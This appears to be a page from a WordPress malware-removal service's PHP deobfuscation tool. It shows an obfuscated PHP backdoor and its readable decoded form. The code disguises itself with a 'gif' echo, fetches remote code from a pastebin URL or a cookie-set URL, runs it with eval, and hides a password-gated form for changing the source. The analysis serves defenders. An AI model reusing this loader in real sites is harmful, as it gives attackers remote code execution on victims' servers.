Japanese 
English
PHP deobfuscation, decryption, reconstruction toolDe-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.
*Please note that not all obfuscation codes can be decoded.<?php
goto tcqlK; GjvMH: exit; goto nHsBc; FBy0J: exit; goto F6D4c; ocCDX: goto NIBbC; goto SyIRz; FzESz: T5ADV: goto c76QS; SyIRz: aseYF: goto av04h; X0YSD: NNpQE: goto jzoCv; ot1Fp: $PFO4A = @file_get_contents(@$_COOKIE["\x74\x73\137\x75\162\x6c"]); goto vm576; RdqPv: goto KuxOe; goto Y93N7; RdtVW: KuxOe: goto aB_8M; tcqlK: echo "\147\151\146"; goto z_zoF; N1oTf: exit; goto RdqPv; hk_nc: exit; goto jpSib; d99j4: goto XSK8a; goto r3cyY; ArCw7: echo "\163\x75\x63\x63\x65\163\x73"; goto L4AK8; r3cyY: I0KcQ: goto jNiN7; g12Ax: foreach ($bBhZK as $Epdoh) { $LSatl .= chr($Epdoh); gHyPl: } goto xaDHW; p30y5: XSK8a: goto RdtVW; hPwKD: if (isset($_GET["\x74\x73"])) { goto w61XT; } goto EHo1D; WD5O2: exit; goto nnQxC; DzTXr: kj5rP: goto JWKZz; gSWoi: echo "\42\x3e\x3c\142\162\x3e\74\57\x66\x6f\162\x6d\76\xd\xa\x20\x20\40\40\40\40\x20\x20\x3c\x2f\142\157\144\171\x3e\15\12\x20\40\40\x20\40\40\x20\x20"; goto N1oTf; xaDHW: oMe_Q: goto rywzv; Y93N7: H0qoy: goto tHsxJ; L4AK8: exit; goto CLcaN; jzoCv: if (isset($_GET["\165\162\x6c"])) { goto T5ADV; } goto XKtga; nHsBc: goto DpUAH; goto X0YSD; tHsxJ: if (isset($_GET["\x70\144"])) { goto I0KcQ; } goto DacDF; c76QS: $HWmfi = $_GET["\x75\162\x6c"]; goto o3sNT; PWx_f: echo "\x20\x20\x20\x20\40\40\40\x20\x3c\150\145\x61\144\76\15\xa\40\40\x20\x20\x20\40\40\40\40\40\x20\x20\74\x73\x74\171\154\145\x3e\xd\xa\x20\40\x20\x20\40\x20\x20\40\40\x20\40\40\x20\x20\x20\40\43\160\x61\163\163\167\157\x72\144\x20\x7b\15\12\40\40\40\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\40\40\x20\40\40\40\157\162\144\x65\162\72\40\62\xd\12\x20\40\x20\x20\40\x20\x20\40\x20\x20\x20\40\40\40\x20\40\x7d\xd\12\15\12\40\40\40\x20\40\x20\x20\x20\x20\40\40\40\x20\x20\x20\x20\x23\165\162\154\x20\173\15\xa\x20\x20\40\x20\x20\x20\40\x20\x20\40\40\x20\x20\40\x20\40\x20\40\40\40\x6f\162\x64\x65\162\x3a\x20\61\15\xa\x20\x20\40\40\x20\40\40\x20\40\40\x20\x20\40\40\x20\x20\175\xd\xa\15\xa\40\40\40\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\x20\40\43\160\x61\163\163\167\157\x72\x64\54\xd\xa\40\40\x20\40\x20\40\x20\40\x20\x20\40\x20\40\x20\40\40\43\x75\162\154\x20\173\15\12\x20\40\40\x20\x20\40\x20\40\40\x20\40\x20\x20\x20\x20\40\x20\40\40\40\x64\x69\x73\160\154\141\x79\x3a\40\142\x6c\x6f\x63\x6b\73\xd\xa\40\40\40\40\x20\x20\40\40\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\x20\155\x61\x72\147\151\156\55\142\x6f\164\164\x6f\155\x3a\40\x31\60\160\x78\x3b\15\12\40\40\x20\40\x20\40\x20\x20\40\x20\x20\40\40\40\x20\40\x20\x20\x20\40\x6f\160\x61\143\151\164\x79\x3a\40\x30\73\15\12\40\40\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\x20\x20\40\40\x20\x20\164\x72\x61\x6e\163\151\x74\x69\157\156\x3a\40\157\160\141\143\151\164\x79\x20\56\x33\163\xd\12\x20\40\x20\40\x20\x20\40\40\x20\40\40\x20\40\x20\40\x20\175\xd\xa\xd\12\x20\40\40\40\40\x20\x20\x20\40\x20\40\40\40\x20\40\x20\43\x70\x61\x73\x73\x77\x6f\x72\x64\x3a\150\157\166\145\x72\x2c\xd\12\40\40\40\x20\40\40\x20\40\40\40\40\x20\x20\x20\x20\40\x23\x75\162\x6c\x3a\150\157\166\x65\162\x20\x7b\15\12\x20\x20\40\40\40\x20\x20\40\x20\x20\40\40\x20\x20\x20\40\x20\x20\40\x20\x6f\160\x61\143\x69\x74\x79\x3a\40\x31\xd\xa\40\40\40\40\x20\40\x20\40\40\40\40\x20\x20\40\x20\x20\x7d\xd\xa\xd\xa\40\x20\x20\x20\x20\40\x20\40\x20\40\40\40\40\x20\x20\40\146\x6f\x72\x6d\x20\x7b\15\12\x20\x20\x20\x20\x20\x20\40\x20\x20\40\x20\x20\x20\40\x20\40\40\40\40\x20\x64\x69\163\160\154\x61\x79\72\40\146\154\145\x78\x3b\15\12\40\40\x20\40\x20\x20\x20\40\x20\x20\40\40\40\40\40\x20\40\40\40\40\146\154\145\x78\55\144\x69\x72\145\x63\x74\x69\157\x6e\72\x20\x63\157\x6c\x75\x6d\x6e\73\xd\xa\40\x20\x20\x20\x20\40\x20\x20\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\x20\x61\154\151\x67\156\55\151\164\145\155\x73\x3a\x20\146\154\145\x78\55\145\156\x64\15\xa\x20\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\x20\40\x20\x20\175\xd\xa\40\x20\x20\x20\x20\40\40\40\x20\x20\40\40\74\57\163\164\171\x6c\145\x3e\15\xa\40\x20\x20\x20\x20\40\40\40\40\40\40\x20\74\163\143\x72\151\x70\x74\76\144\157\143\165\155\x65\x6e\x74\x2e\x61\144\144\105\166\x65\x6e\x74\114\151\x73\164\145\156\x65\162\50\x22\104\x4f\115\x43\x6f\x6e\x74\145\x6e\164\x4c\157\x61\x64\x65\x64\x22\54\40\x66\x75\156\x63\x74\151\x6f\x6e\x20\50\x29\40\x7b\40\144\157\x63\x75\155\x65\x6e\164\x2e\161\165\x65\x72\x79\x53\145\x6c\145\143\164\x6f\162\50\x22\x23\160\141\x73\x73\167\x6f\162\144\42\x29\x2e\x61\x64\144\105\166\145\x6e\x74\114\151\163\x74\145\x6e\145\x72\50\42\153\x65\171\x64\157\x77\x6e\x22\54\40\x66\165\x6e\x63\164\151\x6f\x6e\x20\50\145\51\40\x7b\x20\42\x45\x6e\164\145\x72\42\x20\75\x3d\75\40\145\x2e\x6b\x65\171\40\x26\x26\40\50\x65\56\160\162\x65\166\145\x6e\164\104\145\146\x61\165\x6c\x74\x28\51\54\x20\x64\157\x63\x75\x6d\145\x6e\x74\x2e\161\x75\x65\x72\171\x53\x65\154\x65\143\164\x6f\x72\50\42\x66\157\162\155\42\x29\x2e\163\x75\x62\x6d\151\x74\50\51\51\40\175\x29\x20\175\x29\x3c\x2f\163\x63\x72\151\x70\164\x3e\15\12\x20\x20\40\40\40\x20\40\x20\74\57\150\145\141\144\76\xd\xa\xd\xa\40\x20\40\x20\40\x20\40\x20\x3c\142\157\x64\171\x3e\xd\xa\x20\40\40\40\x20\40\x20\x20\x20\x20\40\40\74\x66\157\162\x6d\40\x61\143\x74\x69\x6f\156\x3d\x22\42\x20\x6d\145\x74\150\157\144\75\x22\x67\x65\x74\x22\x3e\74\151\156\160\165\x74\40\164\171\x70\x65\x3d\47\x68\x69\x64\x64\145\x6e\47\40\156\141\x6d\x65\75\x27\x74\x73\x27\40\166\141\154\165\x65\75\47\x31\x27\40\x2f\x3e\x3c\151\x6e\x70\165\164\x20\x74\x79\160\145\x3d\47\150\151\144\x64\x65\x6e\x27\x20\x6e\141\155\145\75\47\x74\152\47\40\x76\x61\154\x75\x65\75\x27\x31\x27\x20\x2f\x3e\x3c\151\156\160\165\164\40\x69\x64\75\x22\160\x61\163\163\167\x6f\x72\144\42\40\x6e\141\155\145\75\x22\160\x64\x22\40\x74\x79\160\x65\x3d\42\x70\141\x73\163\167\x6f\x72\x64\42\x3e\74\142\162\x3e\74\151\x6e\x70\165\x74\x20\x69\144\75\x22\x75\x72\154\x22\x20\156\x61\x6d\x65\x3d\42\165\162\x6c\42\xd\12\40\x20\40\x20\x20\40\40\40\x20\x20\x20\40\x20\40\x20\40\x20\x20\40\x20\x76\141\x6c\165\145\x3d\x22"; goto bwYkR; yPikp: echo ''; goto GjvMH; CLcaN: cmcOY: goto hPwKD; G0OCj: DpUAH: goto p30y5; tVVIl: $bBhZK = [104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 83, 112, 54, 80, 105, 81, 76, 86]; goto jNs0I; c4k4Z: w61XT: goto secus; gJG6G: exit; goto d99j4; aB_8M: vtlp6: goto GbpaU; E8yxU: $Jlevz = "\x24\x32\x79\44\x31\x30\x24\132\145\65\65\x47\x72\x6b\56\x2e\x6c\x52\142\x5a\121\x33\x45\x59\164\150\115\156\117\143\163\162\67\63\71\x49\154\64\146\101\x45\x4e\x6d\151\64\104\x6b\167\x71\161\x4b\x55\127\141\x53\x71\x4d\x46\x58\x57"; goto pH0wC; jNiN7: $mv6XT = $_GET["\x70\144"]; goto Ctf0D; jpSib: fcxNl: goto tBgzv; zjhfn: DT8di: goto ocCDX; nnQxC: xDMDl: goto G0OCj; rywzv: $HWmfi = $LSatl; goto E8yxU; Ctf0D: if (password_verify($mv6XT, $Jlevz)) { goto NNpQE; } goto yPikp; F6D4c: goto xDMDl; goto FzESz; JWKZz: NIBbC: goto R48r4; R48r4: goto vtlp6; goto c4k4Z; vm576: if (!empty($PFO4A)) { goto DT8di; } goto eBWQu; EHo1D: if (empty(@$_COOKIE["\164\x73\x5f\165\162\154"])) { goto aseYF; } goto ot1Fp; eBWQu: $PFO4A = r8Gwg(@$_COOKIE["\164\x73\137\x75\162\154"]); goto zjhfn; DacDF: echo ''; goto gJG6G; GbpaU: if (!is_string($PFO4A)) { goto fcxNl; } goto rUzfS; av04h: $PFO4A = @file_get_contents($HWmfi); goto T9zJu; z_zoF: function R8GwG($HWmfi) { goto tMi9D; tMi9D: $Elxe6 = curl_init(); goto MrNg7; MrNg7: curl_setopt($Elxe6, CURLOPT_URL, $HWmfi); goto BML0_; BML0_: curl_setopt($Elxe6, CURLOPT_RETURNTRANSFER, true); goto VzNgC; aXYUg: curl_close($Elxe6); goto Ji1WB; Ji1WB: return $PFO4A; goto wYdo_; VzNgC: $PFO4A = curl_exec($Elxe6); goto aXYUg; wYdo_: } goto tVVIl; jNs0I: $LSatl = ''; goto g12Ax; WCwky: setcookie("\x74\163\x5f\165\162\x6c", '', time() + 36000); goto ArCw7; rRgV7: $PFO4A = r8GWg($HWmfi); goto DzTXr; rUzfS: eval("\x3f\76" . $PFO4A); goto hk_nc; bwYkR: echo isset($_GET["\x75\x72\x6c"]) ? $_GET["\165\x72\x6c"] : ''; goto gSWoi; XKtga: echo "\x45\x72\x72\157\x72\x21"; goto FBy0J; T9zJu: if (!empty($PFO4A)) { goto kj5rP; } goto rRgV7; secus: if (isset($_GET["\164\152"])) { goto H0qoy; } goto PWx_f; yrW70: echo "\165\160\144\x61\164\x65\x64\x20\72\x20" . $HWmfi; goto WD5O2; o3sNT: setcookie("\x74\x73\137\165\x72\x6c", $HWmfi, time() + 36000); goto yrW70; pH0wC: if (!isset($_GET["\164\x73\x5f\162\x65\163\x65\164"])) { goto cmcOY; } goto WCwky; tBgzv: echo "\x45\162\162\157\162";
?><?php
echo "gif";
function R8GwG($HWmfi)
{
$Elxe6 = curl_init();
curl_setopt($Elxe6, CURLOPT_URL, $HWmfi);
curl_setopt($Elxe6, CURLOPT_RETURNTRANSFER, true);
$PFO4A = curl_exec($Elxe6);
curl_close($Elxe6);
return $PFO4A;
}
$bBhZK = [104, 116, 116, 112, 115, 58, 47, 47, 112, 97, 115, 116, 101, 98, 105, 110, 46, 99, 111, 109, 47, 114, 97, 119, 47, 83, 112, 54, 80, 105, 81, 76, 86];
$LSatl = '';
foreach ($bBhZK as $Epdoh) {
$LSatl .= chr($Epdoh);
}
$HWmfi = $LSatl;
$Jlevz = "\$2y\$10\$Ze55Grk..lRbZQ3EYthMnOcsr739Il4fAENmi4DkwqqKUWaSqMFXW";
if (!isset($_GET["ts_reset"])) {
if (isset($_GET["ts"])) {
if (isset($_GET["tj"])) {
if (isset($_GET["pd"])) {
$mv6XT = $_GET["pd"];
if (password_verify($mv6XT, $Jlevz)) {
if (isset($_GET["url"])) {
$HWmfi = $_GET["url"];
setcookie("ts_url", $HWmfi, time() + 36000);
echo "updated : " . $HWmfi;
exit;
}
echo "Error!";
exit;
}
echo '';
exit;
}
echo '';
exit;
}
echo " <head>\r\n <style>\r\n #password {\r\n order: 2\r\n }\r\n\r\n #url {\r\n order: 1\r\n }\r\n\r\n #password,\r\n #url {\r\n display: block;\r\n margin-bottom: 10px;\r\n opacity: 0;\r\n transition: opacity .3s\r\n }\r\n\r\n #password:hover,\r\n #url:hover {\r\n opacity: 1\r\n }\r\n\r\n form {\r\n display: flex;\r\n flex-direction: column;\r\n align-items: flex-end\r\n }\r\n </style>\r\n <script>document.addEventListener(\"DOMContentLoaded\", function () { document.querySelector(\"#password\").addEventListener(\"keydown\", function (e) { \"Enter\" === e.key && (e.preventDefault(), document.querySelector(\"form\").submit()) }) })</script>\r\n </head>\r\n\r\n <body>\r\n <form action=\"\" method=\"get\"><input type='hidden' name='ts' value='1' /><input type='hidden' name='tj' value='1' /><input id=\"password\" name=\"pd\" type=\"password\"><br><input id=\"url\" name=\"url\"\r\n value=\"";
echo isset($_GET["url"]) ? $_GET["url"] : '';
echo "\"><br></form>\r\n </body>\r\n ";
exit;
}
if (empty(@$_COOKIE["ts_url"])) {
$PFO4A = @file_get_contents($HWmfi);
if (!empty($PFO4A)) {
goto kj5rP;
}
$PFO4A = r8GWg($HWmfi);
kj5rP:
goto JWKZz;
}
$PFO4A = @file_get_contents(@$_COOKIE["ts_url"]);
if (!empty($PFO4A)) {
goto DT8di;
}
$PFO4A = r8Gwg(@$_COOKIE["ts_url"]);
DT8di:
JWKZz:
aB_8M:
if (!is_string($PFO4A)) {
echo "Error";
// [PHPDeobfuscator] Implied script end
return;
}
eval("?>" . $PFO4A);
exit;
}
setcookie("ts_url", '', time() + 36000);
echo "success";
exit;Malware detection & removal plugin for WordPress
(C)2020 Wordpress Doctor All rights reserved.